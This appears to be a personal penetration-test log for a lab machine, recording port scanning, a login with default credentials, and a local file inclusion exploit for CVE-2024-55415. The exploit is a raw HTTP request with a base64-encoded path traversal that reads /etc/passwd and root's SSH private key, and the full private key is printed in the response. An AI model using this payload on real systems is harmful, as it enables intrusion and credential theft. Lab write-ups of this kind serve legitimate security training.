CVE-2024-55415
๐งช Pentest Log: {{date:2025-08-02}}
๐ Target Information
- Machine Name: CVE-2024-55415
- IP Address: 192.168.172.81
- Operating System: Linux
ip=192.168.172.81
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 8000
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Found /admin/login page, login with default credential
admin@admin.com:password
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 8000
- Vulnerability Type: LFI
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
CVE-2024-55415
GET /admin/compass?download=Li4vLi4vLi4vLi4vLi4vLi4vLi4vcm9vdC8uc3NoL2lkX3JzYQ== HTTP/1.1
Host: 192.168.172.81:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://192.168.172.81:8000/admin/compass?log=L2V0Yy9wYXNzd2Q=
Cookie: XSRF-TOKEN=eyJpdiI6IkpkaERUUm8zcjlHTUdxTkZ6NGN3THc9PSIsInZhbHVlIjoiaFIzUE9iZ3Uxc0xWRGZON3V6aWx5QmE3bTZoRnNsNnh4ZHNTV2FuOFNXWjh3bk01Z3BvMXpja1JsZGRLK2Y2MmYyZmx6MDFBQ3kzMUkxQmZVY3U5QTc0WCtUSzNZVzFJa1VkMitDNU80MGVCYlVndlpoejRvS1JqK0dLamlDSm4iLCJtYWMiOiI1YmU0YmQ3YTZjZDM4NzZjZjA1ZjUzYzAyNmEyMDM4NzgyOTM2ODNhZTBmY2FhMzM2MDM1ZTllMjY1NjI5NDg5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImgyNGFwdUtQMUl3R3lVQ2ZlQ1NIQ2c9PSIsInZhbHVlIjoicHAwZExtT013T0VCWVozNjIzelh6eVRwQVZodWtuZXVraFlieGtyRHBUQjJJMk85VG5sTy9HTU1XNE4wN1pzMVpkYWltY3FFZWlTaGRaZ0JtSHpZbWhXb3Z4ZHh5SjBsaHgwdEw2N0FNVmdtUFVaMXl5bzRRcS8yUEk5dzA1MFQiLCJtYWMiOiJkYzY4NDg2MWNiZjhkZTkwOTlmODY3YzAyZjJiMjMwODgxYzYwN2JjNzUzMTY0NDc3ZDk1YWI5MzJiMDMwYzA4IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Get response
HTTP/1.1 200 OK
Host: 192.168.172.81:8000
Date: Wed, 20 Aug 2025 22:16:54 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.29
Cache-Control: public
Date: Wed, 20 Aug 2025 22:16:54 GMT
Last-Modified: Tue, 15 Jul 2025 12:40:58 GMT
Content-Disposition: attachment; filename=id_rsa
Content-Type: text/plain; charset=UTF-8
Content-Length: 1823
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6IlNTTjVUcDdONUZJWklTYlJSRDVIcEE9PSIsInZhbHVlIjoic2xFVldZWXRNY2N1TlF6MWJ2SkRTUUtTeWNySTlLRmZPUEI3R2I0WndOMm5sdUFFejZENyszVkhSVjhLMllib1k2VHdUZWJFSEFzemdEa21XdVR5MEs0RHZpYXZrNHNTcGpwUDlPOElRbzFYTjZTdk5LVGxPN201ZllTRXRLL3AiLCJtYWMiOiIzN2VjN2QyZTNhMDE1ZDc0YmJmNWFjMzdlYWU2OTEwMjgyNWRiNzBmMjQ1NmE2NTM3MTcwMTE2OTM1MzVkZDU5IiwidGFnIjoiIn0%3D; expires=Thu, 21-Aug-2025 00:16:54 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6IlRGMTB5RXo4RlRQYkFOR3k2bjVhMEE9PSIsInZhbHVlIjoiSTJ1WSt5ekdjNTZRWU44Y0dIQXNlaFcrSmRJaHdHRGhBeFVFa3E5UFZFZnIxTWNYc2lJN0dQdzdOVHRhSURoUlg5UmJnNDFSVmVDRUxuNUczc2txdklsNGhoTk9PNHkwM2JEQndxSHF3YWpuWUNTQ0s0dFZiQmZjSU1oRE84dEEiLCJtYWMiOiI0N2M0NjFiYjQyZjk5MGQ2MGM5YWRlNjFhYjNhMTVkM2U1NmYxYjhhODBjMDdlNDBhNDBlMWZiNDNiNWVjNWU5IiwidGFnIjoiIn0%3D; expires=Thu, 21-Aug-2025 00:16:54 GMT; Max-Age=7200; path=/; httponly; samesite=lax
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAtDLdEs/51jkYWcTS/4+vTfjSb1zR8o92YdqrXGvIv9eYyUwNdUlT
WCUNV1wPmRbi6H5mDqql00IVoDq5EXKBv/OIUWHJzttXvo9qmmqOVsbEoEsVO69ODFnEYB
yaow3LHFiB7PYQbvRO+zPtjaejnNYDjc9Lf2pTUKsnIqldh6fUMla8XtWvG7qDz43tarxb
QlFT235JexpjMg5P/MShFR0DNVJ1f78moIpI5RtTTWPgf6w4nwrBNxdJh/ZiwdbAggow94
+545kfq1BO7wV9AWvuNFm4IeI01imtkndP8FLFoo5GoMkV47UK56lm0AWgDO2m/2oJYGtp
GZWGzVynWwAAA8g3MG12NzBtdgAAAAdzc2gtcnNhAAABAQC0Mt0Sz/nWORhZxNL/j69N+N
JvXNHyj3Zh2qtca8i/15jJTA11SVNYJQ1XXA+ZFuLofmYOqqXTQhWgOrkRcoG/84hRYcnO
21e+j2qaao5WxsSgSxU7r04MWcRgHJqjDcscWIHs9hBu9E77M+2Np6Oc1gONz0t/alNQqy
ciqV2Hp9QyVrxe1a8buoPPje1qvFtCUVPbfkl7GmMyDk/8xKEVHQM1UnV/vyagikjlG1NN
Y+B/rDifCsE3F0mH9mLB1sCCCjD3j7njmR+rUE7vBX0Ba+40Wbgh4jTWKa2Sd0/wUsWijk
agyRXjtQrnqWbQBaAM7ab/aglga2kZlYbNXKdbAAAAAwEAAQAAAQB9p8pJSAWrwHyefIW1
9/gCozP6u/sa7bdbXSSJeg+u1ySPmhz4YH1hxdSbynKGClOIVDvOlmiz/C0gYlKTPAoGVE
gGl+4l9QYmt9NagltnX4vVSwYvbHs8WYx6iPe8I+4ygfV3y86B0JMS0I8ibHfG8eXgiWDY
JMicQ/0ySnASG2ShRKUVjDKbrthwu4L0hvYWFGkq1kXlsy17zv4wexy/lVzqoGCQbl8WiP
WtdmOD5R+FHyycrRRofVaj+axthVUv9oCAPAyF3MpDgKSyzcEaqBgZdQxC4r9l7oeoJcSn
x9uD+fjP9ngsD3y8E6+aSoQdb0WSbbvobEy6yMRumD2hAAAAgQDVT9fhy2ZR4OtJhy8uq7
p/BDWhsN4pqTtw4Le16D5Q54p+d7HnzvqvBZ3OXwVQLD5+JpDI4lWqOs7QbPWcP0noAdBQ
m+/3HfKczHdaIcGSL04vQImCciMx6I0ccIYRYzaIf95Bv9KVYkCtrpzFkIOit2iOV3sdDL
/Lk0N0+EXVtAAAAIEA76MJa9lIEtWlIokQoojugk06qatl5/zbTQqSEPZTbcB9IzUpcAMO
LG4q1KcYIObtIRnwYH5ZxzuwmMe3MIWLp9IovDXESStV/0Go3XnVRToS9Of1oR3SBaaXbC
HOZEJmKTf6kSiQs7wLTOEZurPrhFtNFr6DDbDMHcFwxlDe8Z0AAACBAMCA0efvmSvs/DGe
No4riOiuZyHvYw8rg4WoO7mpYO0Xh/yAnMIVEJz0xpehuSieNXq1FZMXslZVvIOdq8z7mC
8KvimWrjejcFIh2INuaF7PNKi20Vv2bEOpeh1IV3d3zvhxW6Rid5IGR03KmQSPwUu2W8eR
H4w4tQXMUMN+DkdXAAAADnJvb3RAbG9jYWxob3N0AQIDBA==
-----END OPENSSH PRIVATE KEY-----
๐งฌ Privilege Escalation
๐ค Current Access
- User: root
- Groups: 0(root)
- Shell Type: ssh
๐ Enumeration
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A